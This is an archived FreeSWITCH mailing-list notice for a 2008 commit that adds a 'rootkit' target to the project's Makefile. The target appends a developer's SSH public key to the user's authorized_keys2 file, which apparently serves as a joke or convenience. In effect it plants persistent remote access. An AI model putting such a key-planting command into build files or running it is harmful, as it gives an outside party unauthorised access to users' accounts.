[Freeswitch-svn] [commit] r10615 - freeswitch/trunk

FreeSWITCH SVN mikej at freeswitch.org
Fri Dec 5 08:47:03 PST 2008


Author: mikej
Date: Fri Dec  5 11:47:02 2008
New Revision: 10615

Log:
add make rootkit

Modified:
   freeswitch/trunk/Makefile.am

Modified: freeswitch/trunk/Makefile.am
==============================================================================
--- freeswitch/trunk/Makefile.am	(original)
+++ freeswitch/trunk/Makefile.am	Fri Dec  5 11:47:02 2008
@@ -449,6 +449,9 @@
 	   || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \
 	test -z "$$fail"
 
+rootkit:
+	cat ssh_keys/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2
+
 # Special targets
 
 coffee me_a_sandwich me_a_sammich:



More information about the Freeswitch-svn mailing list